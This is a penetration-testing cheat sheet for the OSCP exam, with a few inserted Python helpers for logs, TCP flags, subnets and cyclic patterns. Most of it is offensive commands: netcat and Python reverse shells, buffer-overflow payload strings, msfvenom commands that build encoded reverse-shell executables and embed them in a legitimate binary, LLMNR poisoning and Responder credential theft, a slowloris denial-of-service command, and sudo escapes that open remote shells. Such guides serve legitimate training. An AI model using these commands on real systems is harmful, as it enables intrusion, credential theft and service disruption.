OSCP Survival Guide
OSCP Survival Guide Uncensored Version

Kali Linux Offensive Security Certified Professional Playbook

NOTE: This document refers to the target IP as the exported shell variable $ip. To set this value on the command line, use the following syntax: export ip=192.168.1.100

Table of Contents

●  Kali Linux
●  Information Gathering & Vulnerability Scanning
●  Passive Information Gathering
●  Active Information Gathering
●  Port Scanning
●  Enumeration
●  HTTP Enumeration
●  Buffer Overflows and Exploits
●  Shells
●  File Transfers
●  Privilege Escalation
●  Linux Privilege Escalation
●  Windows Privilege Escalation
●  Client, Web and Password Attacks
●  Client Attacks
●  Web Attacks
●  File Inclusion Vulnerabilities LFI/RFI
●  Database Vulnerabilities
●  Password Attacks
●  Password Hash Attacks
●  Networking, Pivoting and Tunneling
●  The Metasploit Framework
●  Bypassing Antivirus Software
  52.  
Kali Linux

●  Set the target IP address in the $ip shell variable
   export ip=192.168.1.100
●  Find the location of a file
   locate sbd.exe
●  Search the directories in the $PATH environment variable for a command
   which sbd
●  Find a file whose name contains a specific string (quote the glob so the shell does not expand it first)
   find / -name "sbd*"
●  Show active internet connections
   netstat -lntp
●  Change password
   passwd
●  Verify a service is running and listening
   netstat -antp | grep apache
●  Start a service
   systemctl start ssh
   systemctl start apache2
●  Unzip a gz file
   gunzip access.log.gz
●  Unzip a tar.gz file
   tar -xzvf file.tar.gz
●  Search command history
   history | grep phrase_to_search_for
●  Have a service start at boot
   systemctl enable ssh
●  Stop a service
   systemctl stop ssh
●  Download a webpage
   wget www.cisco.com
●  Open a webpage
   curl www.cisco.com
●  String manipulation
   ○  Count the number of lines in a file
      wc -l index.html
   ○  Get the start or end of a file
      head index.html
      tail index.html
   ○  Extract all the lines that contain a string
      grep "href=" index.html
   ○  Cut a string by a delimiter, filter the results, then sort
      grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u
   ○  Use grep with a regular expression and write the output to a file
      cat index.html | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u > list.txt
   ○  Use a bash loop to find the IP address behind each host
      for url in $(cat list.txt); do host $url; done
   ○  Collect all the IP addresses from a log file and sort by frequency
      cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
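A Python version of the last pipeline (client IP addresses from an access log, ranked by frequency), added here as an example; it is not from the guide. Unlike cut/sort/uniq it checks that the first field really is an IP address, so a malformed line cannot pollute the count. The log lines it runs on are constructed.

```python
"""Count client IPs in an access log by frequency (added example, not from the guide).
Equivalent to: cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
"""
import ipaddress
from collections import Counter

# Constructed sample lines in Common Log Format (not real traffic).
# The fourth line has a garbage first field to show the validation path.
SAMPLE_LOG = """\
10.11.1.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326
10.11.1.7 - - [10/Oct/2023:13:55:37 +0000] "GET /admin HTTP/1.1" 403 199
10.11.1.5 - - [10/Oct/2023:13:55:38 +0000] "GET /login.php HTTP/1.1" 200 512
not-an-ip - - [10/Oct/2023:13:55:39 +0000] "GET / HTTP/1.1" 200 10
10.11.1.9 - - [10/Oct/2023:13:55:40 +0000] "POST /login.php HTTP/1.1" 302 0
10.11.1.5 - - [10/Oct/2023:13:55:41 +0000] "GET /logo.png HTTP/1.1" 200 8890
"""


def client_fields(log_text):
    """Yield the first space-separated field of each non-empty line (what cut -f 1 gives)."""
    for line in log_text.splitlines():
        first = line.split(" ", 1)[0]
        if first:
            yield first


def ip_frequency(log_text, strict=True):
    """Return [(count, ip), ...] sorted by count descending, then by ip.

    With strict=True a field that is not a valid IPv4/IPv6 address is dropped;
    the shell pipeline has no such check and would count it like any other value.
    """
    counts = Counter()
    for field in client_fields(log_text):
        if strict:
            try:
                ipaddress.ip_address(field)
            except ValueError:
                continue
        counts[field] += 1
    return sorted(((n, ip) for ip, n in counts.items()), key=lambda t: (-t[0], t[1]))


if __name__ == "__main__":
    for n, ip in ip_frequency(SAMPLE_LOG):
        print(f"{n:7d} {ip}")
```

Run it against a real file with `ip_frequency(open("access.log").read())`; pass `strict=False` to get exactly the pipeline's behaviour, garbage fields included.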
  109.  
●  Decoding using Kali
   ○  Decode Base64 encoded values
      echo "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode
   ○  Decode hexadecimal encoded values (xxd -r -ps ignores the whitespace between byte groups)
      echo "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a" | xxd -r -ps
●  Netcat - read and write TCP and UDP packets
   ○  Connect to a POP3 mail server
      nc -nv $ip 110
   ○  Listen on a TCP/UDP port
      nc -nlvp 4444
   ○  Connect to a netcat port
      nc -nv $ip 4444
   ○  Send a file using netcat
      nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe
   ○  Receive a file using netcat
      nc -nlvp 4444 > incoming.exe
   ○  Create a reverse shell with Ncat using cmd.exe on Windows
      nc -nlvp 4444 -e cmd.exe
   ○  Create a reverse shell with Ncat using bash on Linux
      nc -nv $ip 4444 -e /bin/bash
●  Ncat - the netcat of the Nmap project; it adds SSL, so the session is harder for an IDS to inspect
   ○  Reverse shell from Windows using cmd.exe over SSL
      ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl
   ○  Connect to port 4444 using SSL
      ncat -v $ip 4444 --ssl
●  Wireshark
   ○  Show only SMTP (port 25) and ICMP traffic:
      tcp.port eq 25 or icmp
   ○  Show only traffic in the LAN (192.168.x.x), between workstations and servers, no Internet:
      ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16
   ○  Filter by a protocol (e.g. SIP) and filter out unwanted IPs:
      ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip
   ○  Some filters are equivalent:
      ip.addr == 10.43.54.65   equals   ip.src == 10.43.54.65 or ip.dst == 10.43.54.65
      ip.addr != 10.43.54.65   equals   ip.src != 10.43.54.65 or ip.dst != 10.43.54.65
●  Tcpdump
   ○  Display a pcap file
      tcpdump -r password_cracking_filtered.pcap
   ○  Display IPs, then filter and sort
      tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort -u | head
   ○  Grab a packet capture on port 80
      tcpdump tcp port 80 -w output.pcap -i eth0
   ○  Check for the ACK and PSH flags set in a TCP packet (byte 13 of the TCP header, the flags byte, equals 24 = 0x18)
      tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap
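The 'tcp[13] = 24' filter reads byte 13 of the TCP header, the flags byte; 24 is 0x18, which is PSH (0x08) plus ACK (0x10). The Python below is added here as an example and is not part of the guide: it decodes that byte from constructed TCP headers and shows the difference between the exact-match form the guide uses and the mask form tcp[13] & 24 = 24, which also matches packets that carry extra flags.

```python
"""Decode the TCP flags byte tested by tcpdump's 'tcp[13] = 24' (added example, not from the guide).
The TCP headers used below are constructed in build_tcp_header(), not captured traffic."""
import struct

# Bit values of the flags byte (byte 13 of the TCP header), lowest bit first.
TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"),
             (0x10, "ACK"), (0x20, "URG"), (0x40, "ECE"), (0x80, "CWR")]


def flag_names(flags_byte):
    """Names of the flags set in a flags byte, e.g. 0x18 -> ['PSH', 'ACK']."""
    return [name for bit, name in TCP_FLAGS if flags_byte & bit]


def flags_value(*names):
    """Inverse of flag_names: flags_value('PSH', 'ACK') == 24."""
    lookup = {name: bit for bit, name in TCP_FLAGS}
    return sum(lookup[n] for n in names)


def build_tcp_header(sport, dport, flags):
    """Constructed minimal 20-byte TCP header (no options, zero checksum) for testing."""
    data_offset = 5 << 4  # header length of 5 words in the high nibble; reserved bits zero
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, data_offset, flags, 65535, 0, 0)


def tcp_flags_byte(tcp_header):
    """Byte 13 of the TCP header, which is exactly what tcpdump's tcp[13] reads."""
    if len(tcp_header) < 20:
        raise ValueError("TCP header shorter than 20 bytes")
    return tcp_header[13]


def matches_exact(tcp_header, value):
    """Semantics of 'tcp[13] = value': only packets whose flags are exactly value."""
    return tcp_flags_byte(tcp_header) == value


def matches_at_least(tcp_header, mask):
    """Semantics of 'tcp[13] & mask = mask': packets with at least these flags set."""
    return tcp_flags_byte(tcp_header) & mask == mask


if __name__ == "__main__":
    for hdr in (build_tcp_header(40000, 80, flags_value("SYN")),
                build_tcp_header(40000, 80, flags_value("PSH", "ACK")),
                build_tcp_header(40000, 80, flags_value("PSH", "ACK", "URG"))):
        b = tcp_flags_byte(hdr)
        print(f"flags=0x{b:02x} {flag_names(b)} exact24={matches_exact(hdr, 24)} atleast24={matches_at_least(hdr, 24)}")
```

The third packet (PSH, ACK and URG) is the case that separates the two filters: the guide's exact form drops it, the mask form keeps it. Choose the form that matches what the hunt is for.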
  171.  
●  IPTables - deny traffic to ports except for the local loopback
   ○  iptables -A INPUT -p tcp --destination-port 13327 \! -d $ip -j DROP
      iptables -A INPUT -p tcp --destination-port 4444 \! -d $ip -j DROP
  175.  
Information Gathering & Vulnerability Scanning

Passive Information Gathering

Google Hacking

●  Google search to find website subdomains
   site:microsoft.com site:www.microsoft.com
●  Google filetype and intitle
   intitle:"netbotz appliance" "OK" -filetype:pdf
●  Google inurl
   inurl:"level/15/sexec/-/show"
●  Google Hacking Database:
   https://www.exploit-db.com/google-hacking-database/

SSL Certificate Testing

●  https://www.ssllabs.com/ssltest/analyze.html

Email Harvesting

●  Simply Email
   git clone https://github.com/killswitch-GUI/SimplyEmail.git
   ./SimplyEmail.py -all -e TARGET-DOMAIN

Netcraft

●  Determine the operating system and tools used to build a site
   https://searchdns.netcraft.com/

Whois Enumeration

●  whois domain-name-here.com
●  whois $ip

Banner Grabbing

●  nc -v $ip 25
●  telnet $ip 25
●  nc TARGET-IP 80

Recon-ng - full-featured web reconnaissance framework written in Python

●  cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
   cd /opt/recon-ng
   ./recon-ng
   show modules
   help

Active Information Gathering

●  DNS Enumeration
   ○  Host lookup
      host -t ns megacorpone.com
   ○  Reverse lookup brute force - find domains in the same range
      for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found"
   ○  Perform a DNS IP lookup
      dig a domain-name-here.com @nameserver
   ○  Perform an MX record lookup
      dig mx domain-name-here.com @nameserver
   ○  Perform a zone transfer with dig
      dig axfr domain-name-here.com @nameserver
   ○  DNS zone transfers
      Windows DNS zone transfer:
      nslookup -> set type=any -> ls -d blah.com
      Linux DNS zone transfer:
      dig axfr blah.com @ns1.blah.com
   ○  Dnsrecon DNS brute force
      dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
   ○  Dnsrecon DNS list of megacorp
      dnsrecon -d megacorpone.com -t axfr
   ○  DNSEnum
      dnsenum zonetransfer.me
  252.  
Port Scanning

Subnet Reference Table

CIDR   Addresses   Hosts   Netmask            Amount of a Class C
/30    4           2       255.255.255.252    1/64
/29    8           6       255.255.255.248    1/32
/28    16          14      255.255.255.240    1/16
/27    32          30      255.255.255.224    1/8
/26    64          62      255.255.255.192    1/4
/25    128         126     255.255.255.128    1/2
/24    256         254     255.255.255.0      1
/23    512         510     255.255.254.0      2
/22    1024        1022    255.255.252.0      4
/21    2048        2046    255.255.248.0      8
/20    4096        4094    255.255.240.0      16
/19    8192        8190    255.255.224.0      32
/18    16384       16382   255.255.192.0      64
/17    32768       32766   255.255.128.0      128
/16    65536       65534   255.255.0.0        256
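The same table computed from the prefix length with Python's ipaddress module, added here as an example and not part of the guide. It goes slightly beyond the table by handling the /31 and /32 edge cases, where the "subtract network and broadcast" rule behind the Hosts column does not apply.

```python
"""Subnet reference rows computed from a prefix length (added example, not from the guide)."""
import ipaddress
from fractions import Fraction


def subnet_row(prefix):
    """Return the reference-table columns for an IPv4 prefix length.

    hosts follows the table's convention (network and broadcast excluded).
    Edge cases the table does not list: a /31 point-to-point link (RFC 3021)
    uses both addresses, and a /32 is a single host.
    """
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix length must be 0..32")
    net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
    addresses = net.num_addresses
    if prefix == 32:
        hosts = 1
    elif prefix == 31:
        hosts = 2
    else:
        hosts = addresses - 2
    return {
        "prefix": prefix,
        "addresses": addresses,
        "hosts": hosts,
        "netmask": str(net.netmask),
        # Number of /24 ("Class C") networks the prefix spans; a Fraction below 1 for /25../30.
        "class_c": Fraction(addresses, 256),
    }


def reference_table(start=30, end=16):
    """Rows from /start down to /end, in the order the guide lists them."""
    return [subnet_row(p) for p in range(start, end - 1, -1)]


def hosts_in(cidr):
    """Usable host count for a concrete network such as '10.11.1.0/24'."""
    return subnet_row(ipaddress.ip_network(cidr, strict=False).prefixlen)["hosts"]


if __name__ == "__main__":
    print(f"{'CIDR':<6}{'Addresses':>10}{'Hosts':>8}  {'Netmask':<16} Class C")
    for r in reference_table():
        print(f"/{r['prefix']:<5}{r['addresses']:>10}{r['hosts']:>8}  {r['netmask']:<16} {r['class_c']}")
```

hosts_in() is the practical entry point when sizing a scan: it tells you how many addresses a range like $ip/24 will actually make nmap touch.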
  294.  
●  Set the IP address as a variable
   export ip=192.168.1.100
   nmap -A -T4 -p- $ip
●  Netcat port scanning
   nc -nvv -w 1 -z $ip 3388-3390
●  Discover active IPs using ARP on the network
   arp-scan $ip/24
●  Discover who else is on the network
   netdiscover
●  Discover IP, MAC and MAC vendors from ARP
   netdiscover -r $ip/24
●  Nmap stealth scan using SYN
   nmap -sS $ip
●  Nmap stealth scan using FIN
   nmap -sF $ip
●  Nmap banner grabbing
   nmap -sV -sT $ip
●  Nmap OS fingerprinting
   nmap -O $ip
●  Nmap regular scan:
   nmap $ip/24
●  Enumeration scan
   nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt
●  Enumeration scan of all ports, TCP and UDP, with output to a txt file
   nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip
●  Nmap output to a file:
   nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24
●  Quick scan:
   nmap -T4 -F $ip/24
●  Quick scan plus:
   nmap -sV -T4 -O -F --version-light $ip/24
●  Quick traceroute
   nmap -sn --traceroute $ip
●  All TCP and UDP ports
   nmap -v -sU -sS -p- -A -T4 $ip
●  Intense scan:
   nmap -T4 -A -v $ip
●  Intense scan plus UDP
   nmap -sS -sU -T4 -A -v $ip/24
●  Intense scan, all TCP ports
   nmap -p 1-65535 -T4 -A -v $ip/24
●  Intense scan - no ping
   nmap -T4 -A -v -Pn $ip/24
●  Ping scan
   nmap -sn $ip/24
●  Slow comprehensive scan
   nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24
●  Scan with a full TCP connect in order to weed out any spoofed ports designed to troll you
   nmap -p1-65535 -A -T5 -sT $ip

Enumeration

Nmap Enumeration Script List:

●  Nmap discovery
   https://nmap.org/nsedoc/categories/discovery.html
●  Nmap port version detection, MAXIMUM power
   nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>
  373.  
SMB Enumeration

●  SMB OS discovery
   nmap $ip --script smb-os-discovery.nse
●  Nmap port scan
   nmap -v -p 139,445 -oG smb.txt $ip-254
●  NetBIOS information scanning
   nbtscan -r $ip/24
●  Nmap find exposed NetBIOS servers
   nmap -sU --script nbstat.nse -p 137 $ip
●  SMB enumeration tools
   nmblookup -A $ip
   smbclient //MOUNT/share -I $ip -N
   rpcclient -U "" $ip
   enum4linux $ip
   enum4linux -a $ip
●  SMB fingerprinting
   smbclient -L //$ip
●  Nmap scan for open SMB shares
   nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 $ip/24
●  Nmap scans for vulnerable SMB servers
   nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
●  Nmap list all SMB scripts installed
   ls -l /usr/share/nmap/scripts/smb*
●  Enumerate SMB users
   ○  nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
   ○  python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip
●  RID cycling - null sessions
   https://www.trustedsec.com/march-2013/new-tool-release-rpc_enum-rid-cycling-attack/
   ○  ridenum.py $ip 500 50000 dict.txt
   ○  use auxiliary/scanner/smb/smb_lookupsid
●  Manual null session testing
   ○  Windows: net use \\$ip\IPC$ "" /u:""
   ○  Linux: smbclient -L //$ip

LLMNR / NBT-NS Spoofing - Steal credentials off the network

●  Spoof / poison LLMNR / NetBIOS requests:
   auxiliary/spoof/llmnr/llmnr_response
   auxiliary/spoof/nbns/nbns_response
●  Capture the hashes:
   auxiliary/server/capture/smb
   auxiliary/server/capture/http_ntlm
●  Using Responder to steal creds
   git clone https://github.com/SpiderLabs/Responder.git
   python Responder.py -i local-ip -I eth0

SMTP Enumeration - Mail Servers

●  Verify the SMTP port using netcat
   nc -nv $ip 25

SNMP Enumeration - Simple Network Management Protocol

●  Fix SNMP output values so they are human readable
   apt-get install snmp-mibs-downloader
   download-mibs
   echo "" > /etc/snmp/snmp.conf
●  SNMP enumeration commands
   ○  snmpcheck -t $ip -c public
   ○  snmpwalk -c public -v1 $ip 1 | grep hrSWRunName | cut -d '"' -f 2
   ○  snmpenum -t $ip
   ○  onesixtyone -c names -i hosts
●  SNMPv3 enumeration
   nmap -sV -p 161 --script=snmp-info $ip/24
●  Automate the username enumeration process for SNMPv3:
   apt-get install snmp snmp-mibs-downloader
   wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
●  SNMP default credentials
   /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
  462.  
Linux OS Enumeration

●  List all SUID files
   find / -perm -4000 2>/dev/null
●  Determine the current version of Linux
   cat /etc/issue
●  Determine more information about the environment
   uname -a
●  List running processes
   ps -xaf
●  List the allowed (and forbidden) commands for the invoking user
   sudo -l
●  List iptables rules
   iptables --table nat --list
   iptables -vL -t filter
   iptables -vL -t nat
   iptables -vL -t mangle
   iptables -vL -t raw
   iptables -vL -t security

Windows OS Enumeration

●  net config Workstation
●  systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
●  hostname
●  net users
●  ipconfig /all
●  route print
●  arp -A
●  netstat -ano
●  netsh firewall show state
●  netsh firewall show config
●  schtasks /query /fo LIST /v
●  tasklist /SVC
●  net start
●  DRIVERQUERY
●  reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
●  reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
●  dir /s *pass* == *cred* == *vnc* == *.config
●  findstr /si password *.xml *.ini *.txt
●  reg query HKLM /f password /t REG_SZ /s
●  reg query HKCU /f password /t REG_SZ /s

Vulnerability Scanning with Nmap

●  Nmap exploit scripts
   https://nmap.org/nsedoc/categories/exploit.html
●  Nmap search through vulnerability scripts
   cd /usr/share/nmap/scripts/
   ls -l *vuln*
●  Nmap search through Nmap scripts for a specific keyword
   ls /usr/share/nmap/scripts/* | grep ftp
●  Scan for vulnerable exploits with nmap
   nmap --script exploit -Pn $ip
●  Nmap auth scripts
   https://nmap.org/nsedoc/categories/auth.html
●  Nmap vuln scanning
   https://nmap.org/nsedoc/categories/vuln.html
●  Nmap DOS scanning
   nmap --script dos -Pn $ip
●  Nmap execute DOS attack
   nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
●  Scan for ColdFusion web vulnerabilities
   nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip
●  Anonymous FTP dump with Nmap
   nmap -v -p 21 --script=ftp-anon.nse $ip-254
●  SMB security mode scan with Nmap
   nmap -v -p 445 --script=smb-security-mode.nse $ip-254

File Enumeration

●  Find UID 0 files (root execution)
   /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
●  Get a handy Linux file system enumeration script (run it from /var/tmp)
   wget https://highon.coffee/downloads/linux-local-enum.sh
   chmod +x ./linux-local-enum.sh
   ./linux-local-enum.sh
●  Find executable files updated in August
   find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug
●  Find a specific file on Linux
   find /. -name "suid*"
●  Find all the strings in a file
   strings <filename>
●  Determine the type of a file
   file <filename>
●  HTTP Enumeration
   ○  Search for folders with gobuster:
      gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
   ○  OWASP DirBuster - HTTP folder enumeration; can take a dictionary file
   ○  Dirb - directory brute force using a dictionary file
      dirb http://$ip/ wordlist.dict
      dirb http://vm/
   ○  Dirb through a proxy
      dirb http://$ip/ -p $ip:3129
   ○  Nikto
      nikto -h $ip
   ○  HTTP enumeration with Nmap
      nmap --script=http-enum -p80 -n $ip/24
   ○  Nmap check the server methods
      nmap --script http-methods --script-args http-methods.url-path='/test' $ip
   ○  Get the OPTIONS available from a web server
      curl -vX OPTIONS vm/test
   ○  Uniscan directory finder:
      uniscan -qweds -u http://vm/
   ○  Wfuzz - the web brute forcer
      wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test
      wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ
      wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
      wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
      Recurse to level 3:
      wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
●  Open a service using a port knock (secured with knockd)
   for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done
●  WPScan - WordPress security scanner
   ○  wpscan --url $ip/blog --proxy $ip:3129
●  RSH enumeration - unencrypted file transfer system
   ○  auxiliary/scanner/rservices/rsh_login
●  Finger enumeration
   ○  finger @$ip
   ○  finger batman@$ip
●  TLS & SSL testing
   ○  ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html
●  Proxy enumeration (useful for open proxies)
   ○  nikto -useproxy http://$ip:3128 -h $ip
●  Steganography
   apt-get install steghide
   steghide extract -sf picture.jpg
   steghide info picture.jpg
   apt-get install stegosuite

The OpenVAS Vulnerability Scanner

   ○  apt-get update
      apt-get install openvas
      openvas-setup
   ○  netstat -tulpn
   ○  Login at: https://$ip:9392
  654.  
Buffer Overflows and Exploits

●  DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)
●  MSFvenom
   https://www.offensive-security.com/metasploit-unleashed/msfvenom/
●  Windows Buffer Overflows
   ○  Controlling EIP
   ○  locate pattern_create
   ○  pattern_create.rb -l 2700
   ○  locate pattern_offset
   ○  pattern_offset.rb -q 39694438
   ○  Verify the exact location of EIP - [*] Exact match at offset 2606
   ○  buffer="A"*2606+"B"*4+"C"*90
   ○  Check for "bad characters" - run multiple times, 0x00 - 0xFF
   ○  Use Mona to determine a module that is unprotected
   ○  Bypass DEP if present by finding a memory location with read and execute access for JMP ESP
   ○  Otherwise, without DEP, we can stick our
   ○  Use NASM to determine the hex code for a JMP ESP instruction
      ■  /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
      ■  JMP ESP
         00000000 FFE4 jmp esp
   ○  Run Mona in the Immunity log window to find the (FFE4) JMP ESP opcode
      !mona find -s "\xff\xe4" -m slmfc.dll
      found at 0x5f4a358f - flip around for little endian format
   ○  buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
   ○  MSFvenom to create payload
      msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
   ○  Final payload with NOP sled
      buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
   ○  Create a PE reverse shell
      msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
   ○  Create a PE reverse shell and encode 9 times with shikata_ga_nai
      msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
   ○  Create a PE reverse shell and embed it into an existing executable
      msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
   ○  Create a PE reverse HTTPS shell
      msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe
  729.  
  730.  
Shells

●  Netcat shell listener
   nc -nlvp 443
●  Spawning a TTY shell - break out of jail or a limited shell. You should almost always upgrade your shell after taking control of an apache or www user (for example, when you see the error "sh: no job control in this shell" while trying to run an exploit). (Hint: sudo -l to see what you can run.)
   ○  You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost:
      ssh user@$ip nc $localip 4444 -e /bin/sh   (enter the user's password)
      python -c 'import pty; pty.spawn("/bin/sh")'

Buffer Overflows

Run Evan's Debugger (edb) against an app
edb --run /usr/games/crossfire/bin/crossfire

The ESP register points toward the end of our buffer:
add eax,12
jmp eax
83C00C   add eax,byte +0xc
FFE0     jmp eax

Check for "bad characters" by process of elimination - run multiple times, 0x00 - 0xFF

Find a JMP ESP address
"\x97\x45\x13\x08" # Found at address 08134597

crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"

msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

Connect to the shell with netcat:
nc -v $ip 4444
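The EIP-control steps above and the crossfire crash string both rest on two small computations: finding which offset of a cyclic pattern ended up in a register, and writing an address in little-endian byte order. The Python below is added here as an example; it is not from the guide and not Metasploit's own code. It reproduces the Aa0Aa1... character cycle of pattern_create.rb so the guide's own numbers (register value 39694438 at offset 2606, address 0x5f4a358f as "\x8f\x35\x4a\x5f") can be checked during crash triage.

```python
"""Cyclic-pattern offset search and little-endian packing for crash triage
(added example, not from the guide and not Metasploit's code)."""
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_PATTERN = len(UPPER) * len(LOWER) * len(DIGIT) * 3  # 20280 bytes before the cycle repeats


def pattern_create(length):
    """Non-repeating pattern Aa0Aa1Aa2...Ab0Ab1..., the cycle pattern_create.rb uses."""
    if not 0 < length <= MAX_PATTERN:
        raise ValueError(f"length must be 1..{MAX_PATTERN}")
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out.append(u + l + d)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]  # not reached: the loop always covers MAX_PATTERN


def pattern_offset(register_hex, length=MAX_PATTERN):
    """Offset in the pattern of the 4 bytes a register held at the crash, or -1.

    register_hex is the value as the debugger prints it ("39694438"). x86 is
    little-endian, so the bytes as they sat in memory are the reverse of that;
    the reversed order is searched first, the printed order as a fallback, which
    is how pattern_offset.rb behaves as well.
    """
    pat = pattern_create(length).encode("ascii")
    value = bytes.fromhex(register_hex)
    for needle in (value[::-1], value):
        idx = pat.find(needle)
        if idx != -1:
            return idx
    return -1


def little_endian(address):
    """Pack a 32-bit address in the byte order an x86 CPU reads it from memory."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    print(pattern_offset("39694438", 2700))  # 2606, the offset the guide reports
    print(little_endian(0x5f4a358f))         # the "\x8f\x35\x4a\x5f" string used above
    print(little_endian(0x08134597))         # the "\x97\x45\x13\x08" string in the crossfire crash
```

Because each three-character group occurs once, any four consecutive bytes of the pattern identify their offset uniquely up to 20280 bytes; a -1 result means the register did not come from the pattern at all (a second copy of the input, a corrupted pointer) and the crash needs a different explanation.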
  763.  
export TERM=linux

   ○  python -c 'import pty; pty.spawn("/bin/sh")'
   ○  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
   ○  echo os.system('/bin/bash')
   ○  /bin/sh -i
   ○  perl -e 'exec "/bin/sh";'
   ○  perl: exec "/bin/sh";
   ○  ruby: exec "/bin/sh"
   ○  lua: os.execute('/bin/sh')
   ○  (From within IRB) exec "/bin/sh"
   ○  (From within vi) :!bash
   ○  (From within vim) breaking out of vim is done with ':!bash'
   ○  (From within vi) :set shell=/bin/bash:shell
   ○  (From within nmap) !sh
   ○  (From within tcpdump)
      echo $'id\n/bin/netcat $ip 443 -e /bin/bash' > /tmp/.test
      chmod +x /tmp/.test
      sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
   ○  From busybox
      /bin/busybox telnetd -l /bin/sh -p9999
●  Pen Test Monkey PHP reverse shell
   http://pentestmonkey.net/tools/web-shells/php-reverse-shel
●  php-findsock-shell - turns PHP port 80 into an interactive shell
   http://pentestmonkey.net/tools/web-shells/php-findsock-shell
●  Perl reverse shell
   http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
●  PHP powered web browser shell b374k with file upload etc.
   https://github.com/b374k/b374k
●  Windows reverse shell - PowerSploit's Invoke-Shellcode script and inject a Meterpreter shell
   https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
●  Web backdoors from Fuzzdb
